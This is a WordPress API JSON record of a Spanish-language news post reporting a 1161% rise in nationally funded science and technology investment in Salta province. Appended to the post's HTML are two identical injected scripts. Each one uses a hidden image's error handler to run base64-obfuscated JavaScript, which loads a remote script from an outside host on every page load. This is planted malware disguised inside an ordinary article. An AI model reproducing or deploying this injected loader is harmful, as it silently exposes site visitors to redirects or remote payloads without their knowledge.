{"id":2906,"date":"2023-07-26T10:27:47","date_gmt":"2023-07-26T13:27:47","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2906"},"modified":"2025-08-14T00:11:50","modified_gmt":"2025-08-14T03:11:50","slug":"en-esta-gestion-la-inversion-en-ciencia-y-tecnologia-de-salta-crecio-en-un-1161","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2906","title":{"rendered":"En esta gesti\u00f3n la inversi\u00f3n en ciencia y tecnolog\u00eda de Salta creci\u00f3 en un 1161%"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#bc0634\"><em>El dato se dio a conocer durante la 2\u00b0 Asamblea General del Consejo Federal de Ciencia (COFECyT), en la que particip\u00f3 el subsecretario de Ciencia y Tecnolog\u00eda de la Provincia, Carlos Porcelo. Los fondos fueron gestionados ante Naci\u00f3n por la cartera educativa local.<\/em><\/h4>\n\n\n\n<p>En la Ciudad Aut\u00f3noma de Buenos Aires, el subsecretario de Ciencia y Tecnolog\u00eda de Salta,\u00a0<strong>Carlos Porcelo<\/strong>, particip\u00f3 de la segunda Asamblea General del Consejo Federal de Ciencia y Tecnolog\u00eda (COFECyT). Estuvieron presentes el ministro de Ciencia, Tecnolog\u00eda e Innovaci\u00f3n y Presidente del Consejo,\u00a0<strong>Daniel Filmus<\/strong>, su gabinete y representantes de las \u00e1reas de ciencia, tecnolog\u00eda e innovaci\u00f3n de las 24 jurisdicciones del pa\u00eds.<\/p>\n\n\n\n<p>Durante el encuentro se brindaron detalles sobre la inversi\u00f3n que se viene realizando en Salta en materia de ciencia y tecnolog\u00eda, a trav\u00e9s de la transferencia de fondos de Naci\u00f3n a la Provincia.<\/p>\n\n\n\n<p>Cabe destacar que, en esta jornada de trabajo, se inform\u00f3 que durante la actual gesti\u00f3n se aprobaron para la provincia de Salta fondos por m\u00e1s de 14 millones de d\u00f3lares, de los cuales USD 9,5 millones ser\u00e1n utilizados para obras de infraestructura en el marco del Programa \u201cConstruir Ciencia\u201d y USD 4,7 millones para la adquisici\u00f3n de equipamiento para distintas instituciones cient\u00edfico tecnol\u00f3gicas a trav\u00e9s del Programa \u201cEquipar Ciencia\u201d.<br>&nbsp;<br>Esto permiti\u00f3 que la inversi\u00f3n nacional en Ciencia y Tecnolog\u00eda gestionada por la provincia de Salta a trav\u00e9s del Ministerio de Educaci\u00f3n crezca en un 1161%.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/en-esta-gestion-la-inversion-en-ciencia-y-tecnologia-de-salta-crecio-en-un-1161-90850\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El dato se dio a conocer durante la 2\u00b0 Asamblea General del Consejo Federal de Ciencia (COFECyT), en la que particip\u00f3 el subsecretario de Ciencia y Tecnolog\u00eda de la Provincia, Carlos Porcelo. Los fondos fueron gestionados ante Naci\u00f3n por la cartera educativa local. En la Ciudad Aut\u00f3noma de Buenos Aires, el subsecretario de Ciencia y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2907,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,11],"tags":[],"class_list":{"0":"post-2906","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-datos-utiles"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2906"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2906"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2906\/revisions"}],"predecessor-version":[{"id":7012,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2906\/revisions\/7012"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2907"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2906"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2906"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2906"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}